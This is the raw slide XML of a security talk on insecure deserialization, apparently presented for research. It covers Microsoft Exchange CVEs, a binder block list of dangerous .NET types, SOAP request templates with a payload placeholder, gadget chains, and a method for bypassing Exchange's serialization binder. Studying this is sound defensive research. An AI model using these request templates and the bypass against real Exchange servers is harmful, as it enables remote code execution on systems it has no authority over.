            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Java - Runtime.exec()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>C# - System.Diagnostics.Process.Start()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1102048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 err="1"/>
              <a:t>ChainedSerializationBinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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A7C39-59EB-0981-EB11-8E9E071F7931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1779554"/>
            <a:ext cx="960316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serializationOnly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ChainedSerializationBinder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was created for serialization only.  This instance cannot be used for deserialization."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InternalBindToType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ValidateTypeToDeserialize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InternalBindToType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5390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 err="1"/>
              <a:t>ChainedSerializationBinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Class</a:t>
            </a:r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19437-D402-6753-4CFA-C51A8352250A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145205" y="1625266"/>
            <a:ext cx="1173807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ValidateTypeToDeserialize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typeToDeserialize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typeToDeserialize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typeToDeserialize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allowedTypesForDeserialization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allowedTypesForDeserialization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&amp;&amp;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ChainedSerializationBinder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GlobalDisallowedTypesForDeserialization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{0} failed deserialization (BlockList)."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more checks against allowed and disallowed types - throw BlockedDeserializeTypeException in case of invalid type</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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2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BlockedDeserializeTypeException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DeserializationTypeLogger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Singleton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CA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DeserializationTypeLogger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BlockStatus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TrulyBlocked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DeserializationTypeLogger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BlockStatus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WouldBeBlocked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2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flag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2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802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 err="1"/>
              <a:t>ChainedSerializationBinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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03A7F-E446-115E-AC00-08C13CA8CFA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749573" y="1896477"/>
            <a:ext cx="883494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BuildDisallowedTypesForDeserialization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"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter"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"System.Runtime.Serialization.Formatters.Soap.SoapFormatter"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"System.Runtime.Serialization.NetDataContractSerializer"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"System.Security.Claims.ClaimsIdentity"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System.Security.ClaimsPrincipal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"System.Security.Principal.WindowsIdentity"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"System.Security.Principal.WindowsPrincipal"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"System.Security.SecurityException"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"System.Web.Security.RolePrincipal"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092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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System.Security.Claims.ClaimsPrincipal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672F2-7C12-F40F-C62C-D38A97482FA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780969" y="2026787"/>
            <a:ext cx="872506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OnDeserialized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SecurityCritical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OnDeserializedMethod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ISerializable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m_serializedClaimsIdentities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m_serializedClaimsIdentities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89056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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System.Security.Claims.ClaimsPrincipal Class</a:t>
            </a:r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53A51-BECE-235F-9FD3-F3D72663BC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1978395"/>
            <a:ext cx="112177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ClaimsIdentity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FromBase64String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identities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736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to Deserialization Sink</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder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D231F93-C36E-47BA-00F0-5E92CD503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11" y="1825625"/>
            <a:ext cx="10160777" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="759445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to Deserialization Sink</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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881E37EF-CEE4-8A54-5571-DF53BBDE1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07"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1828800"/>
            <a:ext cx="10130495" cy="3757353"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7562836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CU11 - 15.2.986.9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OrgExtensionSerializer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F6FC0-D6DC-FEEA-00F8-87DD9888954C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511232" y="1957242"/>
            <a:ext cx="108772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TryDeserialize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IUserConfiguration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userConfiguration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OrgExtensionRetrievalResult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HasDefaultExtensionsWithDefaultStatesOnly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userConfiguration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Extensions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52707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CreateUserConfiguration operation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F8CA4-A71E-6A56-C751-431CC3A4E3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746759" y="1523367"/>
            <a:ext cx="96732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&lt;soap:Envelope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xmlns:m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"http://schemas.microsoft.com/exchange/services/2006/messages"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"http://schemas.microsoft.com/exchange/services/2006/types"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xmlns:soap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"http://schemas.xmlsoap.org/soap/envelope/"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&lt;soap:Header&gt;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&lt;t:RequestServerVersion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"Exchange2013"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&lt;/soap:Header&gt;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&lt;soap:Body&gt;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&lt;m:CreateUserConfiguration&gt;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&lt;m:UserConfiguration&gt;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&lt;t:UserConfigurationName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"ExtensionMasterTable"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&lt;t:FolderId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"&lt;FOLDERID&gt;"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ChangeKey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"&lt;CHANGEKEY&gt;"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&lt;/t:UserConfigurationName&gt;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&lt;t:Dictionary&gt;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[... Truncated ...]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&lt;/t:Dictionary&gt;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&lt;t:BinaryData&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" b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&lt;BASE64_PAYLOAD&gt;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&lt;/t:BinaryData&gt;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&lt;/m:UserConfiguration&gt;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&lt;/m:CreateUserConfiguration&gt;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&lt;/soap:Body&gt;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&lt;/soap:Envelope&gt;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09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GetClientAccessToken operation</a:t>
            </a:r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05CC-D28A-5283-E777-D467DA91B86B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494607" y="1529018"/>
            <a:ext cx="112027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version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encoding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&lt;soap:Envelope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xmlns:soap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"http://schemas.xmlsoap.org/soap/envelope/"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"https://schemas.microsoft.com/exchange/services/2006/types"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"https://schemas.microsoft.com/exchange/services/2006/messages"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&lt;soap:Header&gt;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&lt;t:RequestServerVersion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"Exchange2013"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&lt;/soap:Header&gt;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&lt;soap:Body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&lt;m:GetClientAccessToken&gt;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&lt;m:TokenRequests&gt;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&lt;t:TokenRequest&gt;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&lt;t:Id&gt;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1C50226D-04B5-4AB2-9FCD-42E236B59E4B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&lt;/t:Id&gt;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&lt;t:TokenType&gt;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CallerIdentity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&lt;/t:TokenType&gt;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&lt;/t:TokenRequest&gt;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&lt;/m:TokenRequests&gt;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&lt;/m:GetClientAccessToken&gt;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&lt;/soap:Body&gt;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&lt;/soap:Envelope&gt;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0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E656-20B3-0417-8746-0AD1F1F5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Deserialization Gadgets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89B2-F09A-CA11-CCDF-95090122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Property-Oriented Programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abuse existing code to reach from deserialization function to an interesting sink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AF370-F300-6B28-5E4D-FC40DCB653BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983671" y="3429000"/>
            <a:ext cx="71766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Hashtable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readObject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Hashtable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reconstitutionPut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apache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AbstractMapDecorator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equals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AbstractMap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equals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apache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LazyMap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get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apache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functors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ChainedTransformer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apache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commons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functors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InvokerTransformer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DelegatingMethodAccessorImpl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NativeMethodAccessorImpl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reflect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NativeMethodAccessorImpl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invoke0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270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CVE-2021-42321 - Summary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01A37-5BAC-D9D3-46C7-0CD44EF4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ChainedSerializationBinder called with strictMode = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Typo in list of disallowed typed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="776680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CVE-2022-21969</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Text, engineering drawing&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DACE6A85-8815-4436-614C-8FCB968C0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88" y="1245230"/>
            <a:ext cx="3274223" cy="5337700"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1244188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CVE-2022-21969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01A37-5BAC-D9D3-46C7-0CD44EF4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/>
              <a:t>Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Uses BinaryFormatter with Binder set to ChainedSerializationBinder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by Dr. Florian Hauser with Code White GmbH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patched in January 2022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223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CVE-2022-21969 – Call Path</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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9EA9209C-0F71-5075-4A23-7338CE6E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67" y="1825625"/>
            <a:ext cx="8963866" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29459436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CU11 - 15.2.986.14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ExchangeCertificateRpc Class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FC315-E4B6-A776-6468-92A8E5A929FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538607" y="1949202"/>
            <a:ext cx="117594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DeserializeObject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customized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strictModeStatus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GetStrictModeStatus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ExchangeCertificateRpc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ExchangeBinaryFormatterFactory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ExchangeCertificateRpc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strictModeStatus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ExchangeCertificateRpc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allowedTypes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ExchangeCertificateRpc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434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CU11 - 15.2.986.14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ExchangeBinaryFormatterFactory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1F40E-FD34-5E47-9EF7-505C27255602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447332" y="2044474"/>
            <a:ext cx="111241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CreateBinaryFormatter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BinaryFormatter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ChainedSerializationBinder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allowList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allowedGenerics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0441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CU11 - 15.2.986.14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Serialization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5626A-3A46-E419-4B0D-782D56C86697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473098" y="2160769"/>
            <a:ext cx="111509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GetStrictModeStatus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DataConfiguration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GetSnapshot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MachineSettingsContext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IsStrictModeEnabled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&amp;&amp; !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LearningLocations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&amp;&amp;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1703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CU11 - 15.2.986.14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data.settings.ini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F5576-801B-804C-FEDD-D0FCEB222FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361812" y="2351897"/>
            <a:ext cx="113280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Settings used for the serialization binder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[DeserializationBinderSettings] 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_meta.type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=Microsoft.Exchange.VariantConfiguration.Data.IDeserializationBinderSettings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_meta.access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=public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IsStrictModeEnabled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Cluster_SerializationUtil, NetworkPackage, RpcCommon, SerializationTypeConverter, TemplateTenantConfiguration, EwsStoreValueConverter, RetentionEventStoreObjectProvider, TenantInfoProvider, BloomFilterFileSourceReader, SafeLocalizedStringSerializer, ClientExtensionCollectionFormatter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LearningLocations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3776303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CVE-2022-21969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901A37-5BAC-D9D3-46C7-0CD44EF4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r>
              <a:rPr lang="en-US"/>
              <a:t>Strict mode is disabled for ExchangeCertificateRpc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But typo in disallowed types list was fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Need new gadget…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4336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2B61-2F92-F241-BCFE-564D109B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Gadget for NTLM Relay</a:t>
            </a:r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106E8-E96B-AACE-72BB-6EDF0ACE8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0" y="4577767"/>
            <a:ext cx="10408496" cy="60602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9FE372A-5B9C-B046-F53E-F0D1992F4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01" y="1967688"/>
            <a:ext cx="6775798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9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6C66-A051-21A2-B198-3FD3B24F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Open-Source Libraries for Gadget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7E4D-CDBA-5E6F-80E1-32AEC9093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Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/frohoff/ysoserial</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/mbechler/marshalsec</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/pwntester/ysoserial.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/ambionics/phpggc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8873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53C0-52BE-F4C2-3A71-F3733025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DirectoryInfo Constructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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A1C762-E619-DB31-7CC0-867CAE3E6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158"/>
            <a:ext cx="6363027" cy="1803493"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3687213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3199-ECD0-A93A-F685-75082A66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CVE-2022-21969 - Summary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D905-93D7-22CF-C575-AE087266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ChainedSerializationBinder still allows strictMode set to False for certain code paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Disallowed types list does not block all attack vectors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86849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CVE-2022-23277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6A60B1F-E2BB-1317-BBD9-09AC15762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01636"/>
            <a:ext cx="3853080" cy="4875327"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41108517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383C-B33F-E274-3F0B-99BD785D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CVE-2022-23277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2225-DD71-5607-F5D7-C6FB5072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Authenticated RCE due to Insecure Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerable class:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft.Exchange.Diagnostics.ChainedSerializationBinder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Markus Wulftange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Code White GmbH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patched in March 2022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3581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CU11 - 15.2.986.15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Serialization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52F20-9CAA-8A0C-3CA0-C5E2539E2025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343174" y="2147260"/>
            <a:ext cx="115056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GetStrictModeStatus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DeserializeLocation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DataConfiguration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GetSnapshot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MachineSettingsContext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IsStrictModeEnabled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|| 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deserializationBinderSettings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LearningLocations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usageLocation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15366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CU11 - 15.2.986.15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data.settings.ini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241A2-9ABA-2BBA-6F41-43A63F2C6ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515388" y="2092096"/>
            <a:ext cx="110351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Settings used for the serialization binder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[DeserializationBinderSettings] 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_meta.type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=Microsoft.Exchange.VariantConfiguration.Data.IDeserializationBinderSettings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_meta.access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=public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IsStrictModeEnabled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=true</a:t>
            </a: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DisableStrictLocation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r>
              <a:rPr lang="en-CA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;HaRpcError &amp; Test locations have strict mode disabled, but those do not use these flights yet</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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LearningLocations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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1158331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3B29-A091-582E-D3A0-6986099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CVE-2022-23277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B06A-A513-F29E-A74B-F2F0EA85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code paths have enabled strictMode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can we bypass the serialization binder even with strictMode enabled?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6823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CU11 - 15.2.986.15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ChainedSerializationBinder Class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A163-5900-568B-1B77-BEBDC525D73A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465512" y="1752704"/>
            <a:ext cx="1113074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serializationOnly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"ChainedSerializationBinder was created for serialization only.  This instance cannot be used for deserialization."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InternalBindToType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ValidateTypeToDeserialize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InternalBindToType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600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CU11 - 15.2.986.15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ChainedSerializationBinder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0D58E-97AF-4FB0-3D6C-12DB5ED8FBB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561109" y="1690688"/>
            <a:ext cx="1091876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assemblies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assembly2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assembly2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2914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95-4004-E596-D660-A15EF65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[MS-NRBF]: .NET Remoting: Binary Format Data Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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AC536B-72E9-C009-59D3-BA9277B91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6531"/>
            <a:ext cx="5961048" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380938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7FD7F-9DB3-25CD-C108-5671C8C7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Gadget - URLDNS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6F65A-1C2A-1CCD-0E15-F5EC591CA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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Party Libraries Required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2458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95-4004-E596-D660-A15EF65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[MS-NRBF]: .NET Remoting: Binary Format Data Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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3C248137-01CB-D0C0-C0D9-F80F720CC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7" y="1854719"/>
            <a:ext cx="4618371" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23207245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95-4004-E596-D660-A15EF65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[MS-NRTP]: .NET Remoting: Core Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/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AB8B15-FCA5-2EEC-55DD-667AF5E80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000"/>
            <a:ext cx="5470704" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25524994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C395-4004-E596-D660-A15EF650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[MS-NRTP]: .NET Remoting: Core Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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7EAF758-E34A-1257-75B3-9F6559FD7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06741" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14802645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9105-A8D4-1E0D-510D-5253BF9F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Qualified Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/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AD5DFDEC-148D-097E-73D0-D1E4FDBB8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4679"/>
            <a:ext cx="6285265" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2885252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Binding with BinaryFormatter</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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A37EDEA-3AA4-B3C8-CE84-63EF90CC0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796"/>
            <a:ext cx="10515600" cy="3918995"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39308005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 ObjectReader Class</a:t>
            </a:r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E36AC-7C73-68D2-D2FC-71EC707097DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1791775"/>
            <a:ext cx="86400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m_binder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0391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 ObjectReader Class</a:t>
            </a:r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E6F7A-E701-3146-2C77-160F97FDC6C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1638265"/>
            <a:ext cx="104615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ResolveSimpleAssemblyName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finally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CodeAccessPermission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RevertAssert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GetSimplyNamedTypeFromAssembly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86325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Common Object Runtime Library ObjectReader Class</a:t>
            </a:r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600E6-99AD-461C-BEDF-8815B8B6C72A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473826" y="1831212"/>
            <a:ext cx="106984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GetSimplyNamedTypeFromAssembly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endParaRPr lang="en-CA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FormatterServices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GetTypeFromAssembly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Truncated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...]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ResolveSimpleAssemblyName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ObjectReader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TopLevelAssemblyTypeResolver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assm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ResolveType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69489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7DFE-C725-B816-EBC6-0C9E530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ChainedSerializationBinder Bypass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2B15-DCE3-D135-EAF6-1714E705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3088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set type to AQN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set assembly to any valid assembly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20644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6A91-A481-40D0-D369-5969DB2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2019 CU11 - 15.2.986.15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ChainedSerializationBinder Class</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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0A589E-46BD-0B29-4A24-27BBF2271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8357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>InternalBindToType returns null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ValidateTypeToDeserialize is not called and null is returned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A163-5900-568B-1B77-BEBDC525D73A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415635" y="2812576"/>
            <a:ext cx="111307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serializationOnly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"ChainedSerializationBinder was created for serialization only.  This instance cannot be used for deserialization."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InternalBindToType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CA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ValidateTypeToDeserialize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CA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723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25520</TotalTime>
  <Words>8689</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1266</Paragraphs>
  <Slides>120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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>The Current State of Insecure Deserialization Vulnerabilities</vt:lpstr>
      <vt:lpstr>&gt; whoami</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>What is de/serialization?</vt:lpstr>
      <vt:lpstr>What leads to insecure deserialization?</vt:lpstr>
      <vt:lpstr>Insecure Deserialization to RCE</vt:lpstr>
